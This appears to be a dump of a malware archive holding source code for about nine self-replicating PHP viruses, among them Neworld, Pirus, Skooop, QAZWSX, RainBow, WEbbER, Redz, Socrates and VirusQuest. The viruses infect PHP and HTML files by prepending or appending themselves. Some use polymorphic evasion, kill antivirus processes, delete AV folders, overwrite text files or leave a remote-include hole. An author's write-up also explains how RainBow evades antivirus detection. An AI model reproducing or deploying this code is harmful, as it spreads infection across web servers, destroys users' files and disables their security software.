$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.php2')) || ($exe = strstr ($file, '.php3')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'indonesia.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "");
$fputs($new, " $fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all3);
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
?>

45
PHP/Virus.PHP.Neworld Normal file
View File

@ -0,0 +1,45 @@
<?php
$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt = $vir_string . $virstringm;
echo $virt;
$all = opendir('C:\Windows\');
while ($file = readdir($all))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) || ($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'neworld.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "Neworld.PHP - ");
$fputs($new, "Made By Xmorpfic, ");
$fputs($new, "www.shadowvx.com/bcvg, ");
$fputs($new, "The Black Cat Virii Group.");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all);
// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group.
?>

29
PHP/Virus.PHP.Pirus Normal file
View File

@ -0,0 +1,29 @@
<?php
$handle=opendir('.');
while ($file = readdir($handle))
{ $infected=true;
$executable=false;
if ( ($executable = strstr ($file, '.php')) || ($executable = strstr ($file, '.htm')) || ($executable = strstr ($file, '.php')) )
if ( is_file($file) && is_writeable($file) )
{
$host = fopen($file, "r");
$contents = fread ($host, filesize ($file));
$sig = strstr ($contents, 'pirus.php');
if(!$sig) $infected=false;
}
//infect
if (($infected==false))
{
$host = fopen($file, "a");
fputs($host,"<?php ");
fputs($host,"include(\"");
fputs($host,__FILE__);
fputs($host,"\"); ");
fputs($host,"?>");
fclose($host);
return;
}
}
closedir($handle);
?>

43
PHP/Virus.PHP.Pooks.a Normal file
View File

@ -0,0 +1,43 @@
<?php
//skooop!
/*
Virus.PHP.Skooop - written by Kluu in 2007.
Revision 2007.12.30.0001
*/
$self = strstr(file_get_contents(__FILE__), '//skooop!');
function infect($dir) {
global $self;
$handle = opendir($dir);
while (false !== ($file = readdir($handle))) {
$infected = true;
if (is_dir("$dir/$file") && $file != '.' && $file != '..') {
infect("$dir/$file");
}
if (strpos($file, '.php')) {
if (substr($file, -1) != 's') {
$host = fopen("$dir/$file", 'r');
$filesize = filesize("$dir/$file");
if ($filesize == 0) {
$filesize = 1;
}
if (!strpos(fread($host, $filesize), '//skooop!')) {
$infected = false;
}
if (($infected == false)) {
copy("$dir/$file", "$dir/{$file}s");
$host = fopen("$dir/$file", 'a');
fwrite($host, "<?php\n$self");
fclose($host);
}
}
}
}
closedir($handle);
}
echo '<b>Get the source of this phile <a href="'.$file.'s">here</a></b>';
@include($_GET['atk_script']);
infect('../../../../../../../../../../../../../../../../');
?>

92
PHP/Virus.PHP.Qwax Normal file
View File

@ -0,0 +1,92 @@
PHP.QAZWSX
<?//QAZWSX
function Infect($path)
{
global $self;
$handle = opendir($path);
$file = readdir($handle);
while ( false != $file )
{
if ($file != "." && $file != "..")
{
if (is_dir($path.$file))
{
Infect($path.$file."/");
}
else if (strrpos($file, ".php") != 0)
{
$do_infect = true;
$victim = fopen($path.$file, "r+");
while (!feof($victim))
{
$buf = fgets($victim, 4096);
if (strrpos($buf, "QAZWSX") != 0)
{
$do_infect = false;
break;
}
}
if ($do_infect)
{
fputs($victim, $self);
}
fclose($victim);
}
}
$file = readdir($handle);
}
closedir($handle);
}
$found = false;
$bracket_found = false;
$sf = fopen($SCRIPT_FILENAME, "r");
while (!feof($sf))
{
$s = fgets($sf, 4096);
if ($found)
{
$self .= $s;
if (strrpos($s, "?>") != 0)
{
if ($bracket_found)
{
break;
}
else
{
$bracket_found = true;
}
}
}
else if (strrpos($s, "QAZWSX") != 0)
{
$found = true;
$self = $s;
}
}
fclose($sf);
Infect($DOCUMENT_ROOT."/");
?>

38
PHP/Virus.PHP.Rabow Normal file
View File

@ -0,0 +1,38 @@
<?php // RainBow
srand((double)microtime()*1000000);
$changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn');
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$newcont='<?php // RainBow'.chr(13).chr(10);
while ($string && $string!='?>'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
$string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
$counti=0;
while($changevars[$counti]){
$newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
$countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
$number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
$remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
$allcont.=$newcont{$countj};$number='';}
$curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
$viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>

128
PHP/Virus.PHP.Rabow.a Normal file
View File

@ -0,0 +1,128 @@
PHP.Rainbow
by Second Part To Hell[rRlf]
www.spth.de.vu
spth@aonmail.at
written in october 2003
in Austria
You're looking at my very first PHP virus, but don't be sad, it's a really good one :)
First I want to tell you something about the features of the virus, that I'll give
you some Information about the technique of the features.
OK, it's a Prepender PHP virus, which uses three polymorphism tecniques. The poly engine
are totally new, because I've never seen any other poly PHP virus (Kefi did one in
the meantime, but I haven't seen it so far). As I told you, there are three different
Polymorphism techniques, I'm sure that you want to know more about them :) First engine
adds trash/garbage/junk (however you wanna call it) to the code, the second one changes
15 variable/function names. And the last one changes numbers. Now let's have a look at
the better explanation, not this shourt summary :)
Technique Information:
* Poly Engines
--> Adding Trash/Junk/Garbage
The Virus adds ine in two lines a junk line to the code.
This Junk-line could contain:
- // anything
- $anything='anything';
- $anything=number;
Because the code would be damn big after the 5th generation, I desided
to delete the trash after every generation and make a new one. Anyway,
the chance to get a trash-line will be bigger, because there are more
lines (more lines --> more chance). But I tested about 30 generation
and it's no big problem with the size.
--> Changing Variable/function names
The Virus uses an array with all variable/function names of the virus,
every generation it changes every array-entry (every name) to a 5-15
sign long new name.
--> Number changing
The virus is able to change every number in the code. This is a real
successfull way to fake AVs, i think! A number (for instands '10') could
also be one of the following things:
10=(8+2)
10=(19-9)
10=(130/13)
It's easy to understand, I think. I desided to change ever 5th number I can
find, because it looks better than changing every number every generation.
* Infection Method
--> Prepender
This code is a prepender virus, which doesn't harm the victim file.
It reads the first PHP part (which is the whole virus code) of the current
file (__FILE__, as it's called in PHP). Than it searchs for every PHP-files
in the current directory, and adds the changed virus code at the beginn of
the victim file. Before infecting the virus checks, if there's already an
infection mark or the virus, which is 'RainBow'.
Something else little interesting is, that it's hard to get many different generations from
the virus, because it just changes, if it infects a file. And just the infected file has the
different form, not the old virus. That's a little trick, which I read in an article about
Polymorphism by SnakeByte. He wrote, that it will use more time to get many generations, which
is a problem for AVs (who needs many generations :D).
In the end I want to thank the following people, which made it possible, that I
wrote this virus :)
- Fugo <-- Guy from school, PHP expert but non viral stuff :(
Much thanks for the information you gave me in PHP!
- www.php.net & www.apachefriends.com <-- Great PHP information!!!
- MaskBits/VXI <-- Writing the first real PHP maleware (released in 29A#5)
- PhileT0Ast3r <-- Telling me, that Kefi also writes a PHP poly virus
- Kefi <-- for also writing a PHP poly virus :D
- Theatre Of Tragedy | Darkfall <-- for the great sounds!!!
- Cigarettes | Beer <-- for helping me to don't commit suicide while searching
for the bugs in this little thing :)
Maybe you wanna know, why I gave this name. I won't tell you, but the person, where the name
comes from, should understand it ;)
Execute this virus with PHP 4.3.3 + PEAR. I did it, and it worked really fine!
--------------------------------------< PHP.RainBow >--------------------------------------
<?php // RainBow
srand((double)microtime()*1000000);
$changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn');
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$newcont='<?php // RainBow'.chr(13).chr(10);
while ($string && $string!='?>'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
$string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
$counti=0;
while($changevars[$counti]){
$newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
$countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
$number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
$remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
$allcont.=$newcont{$countj};$number='';}
$curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
$viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>

42
PHP/Virus.PHP.Rebber Normal file
View File

@ -0,0 +1,42 @@
<?php
function webb()
{
//[WEbbER] by MI_pirat
//Copyright (C) 2002 [Red-Cell] inc.
$c = "";
//Get the virus from the host file
$f = fopen (__FILE__, "r");
$c = fread ($f, filesize (__FILE__));
fclose ($f);
$c = substr($c,0,866);
//Search for files to infect
$handle=opendir('.');
while (($file = readdir($handle))!==false) {
if ($file != "." && $file != "..")
{
$s = substr($file, -3);
//If not infected yet, infect it!
if ($s=="php")
{
$g = fopen ($file, "r");
$cont = fread ($g,filesize ($file));
fclose ($g);
if (!strstr($cont,"[WEbbER]")) //check the signature
{
unlink("$file"); //delete and prepend the virus
$g = fopen ($file, "a+");
fwrite ($g,"$c");
fwrite ($g,"\n");
fwrite ($g,substr($cont,5)); //append the original file
fclose ($g);
}
}
}
}
closedir($handle);
}
webb();
?>

31
PHP/Virus.PHP.Redz Normal file
View File

@ -0,0 +1,31 @@
<?php
$handle=opendir('.');
while ($file = readdir($handle))
{ $inf_=true;
$ext_=false;
if ( ($ext_ = strstr ($file, '.php')) || ($ext_ = strstr ($file, '.htm')) || ($ext_ = strstr ($file, '.html')) )
if ( is_file($file) && is_writeable($file) )
{
$host = fopen($file, "r");
$contents = fread ($host, filesize ($file));
$sig = strstr ($contents, 'redz.php');
if(!$sig) $inf_=false;
}
if (($inf_==false))
{
$host = fopen($file, "a");
fputs($host,"<?php ");
fputs($host,"include(\"");
fputs($host,__FILE__);
fputs($host,"\"); ");
fputs($host,"?>");
fclose($host);
return;
}
}
closedir($handle);
?>

174
PHP/Virus.PHP.Socrate.a Normal file
View File

@ -0,0 +1,174 @@
<?php
echo("PHP.Socrates by synged flesh"."<br>"."The only true wisdom is in knowing you know nothing.");
$decrypt=
"function SocratesDecrypt(\$string,\$key)\r\n"
."{ \r\n"
." \$codez=''; \r\n"
." for(\$i=0; \$i<strlen(\$string); \$i++)\r\n"
." { \r\n"
." \$value=ord(\$string[\$i]); \r\n"
." \$valuez=\$value+\$key; \r\n"
." \$codez.=chr(\$valuez); \r\n"
." } \r\n"
." return \$codez; \r\n"
." } \r\n"
."\$filez = \$_SERVER[\"SCRIPT_NAME\"];\r\n"
."\$break = Explode('/', \$filez); \r\n"
."\$pfile = \$break[count(\$break) - 1];\r\n"
."\$c = fopen(\$pfile,'rb');\r\n"
."\$d = fread(\$c,filesize(\$pfile));\r\n"
."fclose(\$c);\r\n"
."\$next=strlen(\$d)-693;\r\n"
."\$virus=substr(\$d,687,\$next);\r\n"
."\$vr=SocratesDecrypt(\$virus,'1');\r\n"
."eval(\$vr);";
function SocratesCrypt($string,$key)
{
$codez="";
for($i=0; $i<strlen($string); $i++)
{
$value=ord($string[$i]);
$valuez=$value-$key;
$codez.=chr($valuez);
}
return $codez;
}
if(is_dir("C:\Program Files\Norton*"))
{
exec("taskkill /f /t /im nod32.exe");
rmdir("C:\Program Files\Norton*");
}
if(is_dir("C:\Program Files\McAfee*"))
{
exec("taskkill /f /t /im Mcshield.exe");
rmdir("C:\Program Files\McAfee*");
}
if(is_dir("C:\Program Files\Kaspersky*"))
{
exec("taskkill /f /t /im KAV.exe");
rmdir("C:\Program Files\Kaspersky*");
}
$filez = $_SERVER["SCRIPT_NAME"];
$break = Explode('/', $filez);
$pfile = $break[count($break) - 1];
$c = fopen($pfile,'rb');
$d = fread($c,filesize($pfile));
fclose($c);
$nextsize=strlen($d)-4;
$virus=(substr($d,7,$nextsize));
$dir=opendir('*.*');
while (($file = readdir($dir)) !== false)
{
if (strstr($file,'.php'))
{
$f = fopen($file,'rb');
$contents = fread($f, filesize($file));
if (!strstr($contents, 'Socrates'))
{
if(!file_exists("Socrates.php")) {
fclose($f);
$g = fopen($file,'w');
fwrite($g,$d);
fclose($g);
}
if(file_exists("Socrates.php"))
{
fclose($f);
$g = fopen($file,'w');
fwrite($g,'<?php'.chr(13).chr(10).$decrypt.'/*'.SocratesCrypt($virus,'1').'*/'.'?>');
fclose($g);
}
}
}
if (strstr($file,'.txt'))
{
$f = fopen($file,'w');
fwrite($f,"Let him that would move the world, first move himself.");
}
}?>

44
PHP/Virus.PHP.Virdrus Normal file
View File

@ -0,0 +1,44 @@
<?php
function virusquest()
{
// Virus: VirusQuest
// Written by Dr Virus Quest
// Created on 08/09/2003
$c = "";
$f = fopen (__FILE__, "r");
$c = fread ($f, filesize (__FILE__));
fclose ($f);
$c = substr($c,0,2048);
$handle=opendir('.');
while (($file = readdir($handle))!==false) {
if ($file != "." && $file != "..")
{
$s = substr($file, -3);
if ($s=="php")
{
$g = fopen ($file, "r");
$cont = fread ($g,filesize ($file));
fclose ($g);
if (!strstr($cont,"[VirusQuest]"))
{
unlink("$file");
$g = fopen ($file, "a+");
fwrite ($g,"$c");
fwrite ($g,"\n");
fwrite ($g,"Virus: VirusQuest\n");
fwrite ($g,"Written by Dr Virus Quest\n");
fwrite ($g,"Created on 08/09/2003\n");
fwrite ($g,"\n");
fwrite ($g,substr($cont,5));
fclose ($g);
}
}
}
}
closedir($handle);
}
virusquest();
?>